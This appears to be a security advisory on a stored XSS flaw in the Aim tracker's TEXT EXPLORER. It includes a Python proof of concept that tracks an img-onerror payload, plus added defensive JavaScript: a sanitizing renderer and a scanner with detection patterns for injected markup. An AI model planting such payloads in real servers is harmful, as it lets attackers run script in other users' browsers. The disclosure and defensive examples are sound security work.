Description

credit:Aftersnows@360 Vulnerability Research Institute

In the textbox.tsx file, the text in this area is rendered with React's dangerouslySetInnerHTML prop, so any markup in the tracked text is parsed by the browser and can cause an XSS attack.

Proof of Concept

Through analysis, it can be discovered that dangerouslySetInnerHTML is used in multiple places: not only at the site of the previously reported stored XSS vulnerability, but also within the textbox component.

[TEXT_RNDERER_MODES.HTML]: (
  <div dangerouslySetInnerHTML={{ __html: text }} />
),
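To make the difference between the pattern above and a hardened version concrete, here is an added JavaScript example (not Aim's code and not from the reporter) that models the renderer modes as plain functions so the behaviour can be checked without React. The `TEXT_RENDERER_MODES` name, the `renderUnsafe`/`renderSafe` helpers and the `sanitize` parameter (DOMPurify.sanitize in a real deployment) are assumptions; the fix being illustrated is that `__html` is only ever filled from a sanitizer's output, and that without a sanitizer the text is handed to React as escaped children.

```javascript
// Added example, not Aim's code. Models the textbox renderer modes as plain
// functions so the vulnerable and hardened shapes can be compared without React.
// TEXT_RENDERER_MODES and the mode values are assumptions about textbox.tsx.
const TEXT_RENDERER_MODES = { TEXT: 'text', HTML: 'html' };

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable shape: in HTML mode the tracked text goes to __html untouched, so
// markup tracked through the SDK is parsed by every browser that opens the view.
function renderUnsafe(mode, text) {
  if (mode === TEXT_RENDERER_MODES.HTML) {
    return { dangerouslySetInnerHTML: { __html: text } };
  }
  return { children: text }; // React escapes children
}

// Hardened shape: __html is populated only from a sanitizer's output
// (DOMPurify.sanitize in a real deployment; assumed here). Without a sanitizer,
// HTML mode degrades to escaped text instead of raw markup.
function renderSafe(mode, text, sanitize) {
  if (mode === TEXT_RENDERER_MODES.HTML && typeof sanitize === 'function') {
    return { dangerouslySetInnerHTML: { __html: sanitize(text) } };
  }
  return { children: text };
}

// Regression check: does a rendered prop object hand the raw payload to the DOM?
function leaksRawHtml(props, payload) {
  const html = props.dangerouslySetInnerHTML && props.dangerouslySetInnerHTML.__html;
  return typeof html === 'string' && html.includes(payload);
}

// Constructed payload (same shape as the report's PoC), used only to exercise the check.
const SAMPLE_PAYLOAD = "<img onerror='alert(1)' src='invalid' />";

console.log('unsafe leaks:', leaksRawHtml(renderUnsafe(TEXT_RENDERER_MODES.HTML, SAMPLE_PAYLOAD), SAMPLE_PAYLOAD));
console.log('safe leaks:', leaksRawHtml(renderSafe(TEXT_RENDERER_MODES.HTML, SAMPLE_PAYLOAD, null), SAMPLE_PAYLOAD));
```

In the real component the `sanitize` argument would be DOMPurify (or another maintained HTML sanitizer), never a hand-written regex filter; the `leaksRawHtml` check is the kind of unit test that keeps the `__html` path from silently reappearing in a later refactor.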

Send the following PoC (Proof of Concept) to the target machine:

from aim import Run, Text

# Connect to the Aim tracking server (the PoC targets a local instance)
run = Run(repo="aim://127.0.0.1:53800", capture_terminal_logs=False)
poc = "<img onerror='alert(\\"Hacked!\\");' src='invalid' />"

# Both the tracked text and the sequence name are chosen by the SDK caller
run.track(Text(poc), name=poc, step=1, epoch=1, context={"subset": "train"})

Afterwards, selecting the HTML text renderer in the TEXT EXPLORER feature triggers the stored XSS (Cross-Site Scripting).

https://github.com/user-attachments/assets/9b9f5bb9-91ff-410d-8c0b-6b6ac8719828

A user simply needs to open the TEXT EXPLORER query for the XSS to trigger.

<http://127.0.0.1:43800/text?query=O-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&vis1-c-textRenderer=O-JTdCJTIydHlwZSUyMjolMjJodG1sJTIyJTdE>

Impact

This is a standard stored XSS (Cross-Site Scripting) vulnerability. Once a user triggers it, the injected script executes in that user's browser.

TEXT EXPLORER is designed for querying and filtering large amounts of text that meet certain criteria. Imagine a normal user wanting to use the TEXT EXPLORER feature to query the content they need, while an attacker has injected a large number of XSS payloads into it. The attacker can place the payload in any of the fields they control when tracking (such as name, title, etc.), so the user is exposed to XSS as soon as the matching records are rendered. The impact of this vulnerability is significant.
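As an added example (not part of this report or of Aim), here is a triage scan over tracked Text records that checks every field the SDK caller controls, the sequence name, each context value and the text itself, for stored markup, so that payloads already in a repository can be found before anyone opens TEXT EXPLORER in HTML mode. The record shape (`name`, `context`, `step`, `epoch`, `text`) and the sample records are constructed; the severity labels are a triage aid, not a sanitizer.

```javascript
// Added example, not Aim's code. Finds stored markup in the fields an SDK caller
// controls. Record shape { name, context, step, epoch, text } is an assumption.
const RULES = [
  // tags that execute or redirect as soon as the browser parses them
  { label: 'active-tag',    re: /<\s*(script|iframe|object|embed|svg|math|base|meta|link)\b/i },
  // inline event handler attributes such as onerror=, onload=
  { label: 'event-handler', re: /\bon[a-z]+\s*=/i },
  // script-bearing URL schemes in href/src values
  { label: 'script-url',    re: /\b(javascript|vbscript)\s*:/i },
  // any other tag at all: lowest severity, still worth a look in HTML mode
  { label: 'markup',        re: /<\s*\/?[a-z][^>]*>/i },
];

// Return the most severe matching label for one field value, or null.
function classify(value) {
  if (typeof value !== 'string') return null;
  for (const rule of RULES) {
    if (rule.re.test(value)) return rule.label;
  }
  return null;
}

// Every field the SDK caller controls: the tracked text, the sequence name and
// each context value (the report notes that name/title are attacker-chosen too).
function attackerControlledFields(record) {
  const fields = { name: record.name, text: record.text };
  for (const [key, value] of Object.entries(record.context || {})) {
    fields[`context.${key}`] = value;
  }
  return fields;
}

// Scan a list of records and report { index, field, label, sample } per hit.
function auditTextRecords(records) {
  const findings = [];
  records.forEach((record, index) => {
    for (const [field, value] of Object.entries(attackerControlledFields(record))) {
      const label = classify(value);
      if (label) {
        findings.push({ index, field, label, sample: String(value).slice(0, 60) });
      }
    }
  });
  return findings;
}

// Constructed sample records (not real Aim data): one benign, two carrying markup.
const SAMPLE_RECORDS = [
  { name: 'summary', context: { subset: 'train' }, step: 1, epoch: 1,
    text: 'loss decreased to 0.31 after epoch 1' },
  { name: "<img onerror='alert(1)' src='invalid' />", context: { subset: 'train' }, step: 1, epoch: 1,
    text: "<img onerror='alert(1)' src='invalid' />" },
  { name: 'notes', context: { subset: 'javascript:alert(1)' }, step: 2, epoch: 1,
    text: 'see <b>bold</b> text' },
];

for (const hit of auditTextRecords(SAMPLE_RECORDS)) {
  console.log(`record ${hit.index} field ${hit.field}: ${hit.label} (${hit.sample})`);
}
```

Run the scan over an export of the repository's Text sequences; any `event-handler`, `script-url` or `active-tag` hit is a record that would fire the moment a user switches the renderer to HTML, while plain `markup` hits show how much legitimate HTML a sanitizer would need to preserve.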